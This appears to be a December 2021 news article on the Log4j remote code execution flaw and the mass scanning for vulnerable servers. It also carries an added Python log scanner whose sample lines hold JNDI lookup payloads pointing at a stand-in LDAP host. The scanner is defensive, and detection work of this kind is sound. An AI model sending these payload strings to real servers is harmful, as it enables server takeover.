Services and users using the Apache Log4j logging library on their servers are vulnerable to Remote Code Execution (RCE) attacks. This may also include large applications such as Steam and Apple iCloud. Cyber threat intelligence company Bad Packets writes that massive scanning is already underway for servers running Log4j, indicating that the vulnerability is already being actively exploited.
The Log4j logging library is developed by the Apache Foundation and used worldwide to record the status of, and information about, servers. It is used by all kinds of services, such as game servers for Minecraft and cloud services such as Apple iCloud or Steam. Important enterprise applications, especially those of large companies, can also prove vulnerable.
The exploit enables RCE, which allows attackers to execute code without proper authorization. The exploit is very easy for attackers to perform, as they only need to get a specific string logged by the server. This makes it a piece of cake for cybercriminals to take control of a server. A similar exploit was previously used in the major hack on the American credit company Equifax in 2017.
The bug was already found and reported in November by the Alibaba Cloud Security Team, Bleeping Computer writes. The Alibaba team also indicates that several Apache frameworks with default settings are also likely to be vulnerable. These include Apache Struts2, Apache Solr, Apache Druid, Apache Flink, among others.
Researchers and security companies have already noted that there is active scanning for servers that use the vulnerable Log4j library. According to open source data security platform Lunasec, even more applications will be vulnerable in the near future. Proofs-of-concept are frequently appearing on Twitter, showing that the exploit is particularly effective.
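The scanning described above leaves traces in ordinary web server access logs, because the probe is a Log4j lookup string placed in a request field that the target application is likely to log. The following added example (not code from the article or from Apache) flags such probes in combined-format access log lines; the log lines, IP addresses and the example.invalid host are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Combined log format: ip - - [time] "METHOD path HTTP/x" status size "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# The CVE-2021-44228 trigger is a Log4j lookup of the form ${jndi:...}. Scanners
# commonly URL-encode it or vary its case, so match after decoding, case-insensitively.
JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)

def decode(value: str) -> str:
    # Decode twice: some scanners double-encode the request field.
    for _ in range(2):
        value = unquote(value)
    return value

def scan_access_log(lines):
    """Return (line_no, field, source_ip) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = COMBINED.match(line.rstrip("\n"))
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for field in ("request", "referer", "agent"):
            if JNDI.search(decode(m.group(field))):
                hits.append((n, field, m.group("ip")))
                break
    return hits

# Constructed sample lines (not real traffic): two probes and one benign request.
SAMPLE = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /?x=${jndi:ldap://example.invalid/a} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '198.51.100.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D"',
    '192.0.2.7 - - [10/Dec/2021:14:02:20 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, field, ip in scan_access_log(SAMPLE):
        print(f"line {line_no}: possible CVE-2021-44228 probe from {ip} in {field}")
```

A hit only shows that a probe reached the web server; whether the string was passed to a vulnerable Log4j instance behind it must be checked in the application's own logs.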
Mass scanning activity detected from multiple hosts checking for servers using Apache Log4j (Java logging library) vulnerable to remote code execution (https://t.co/GgksMUlf94).
Query our API for "tags=CVE-2021-44228" for source IP addresses and other IOCs. #threatintel
— Bad Packets (@bad_packets) December 10, 2021
Proof of concept by @Twokilohertz
The Apache Foundation is already working on a patch, but the test version of this fix has been bypassed by researchers so far.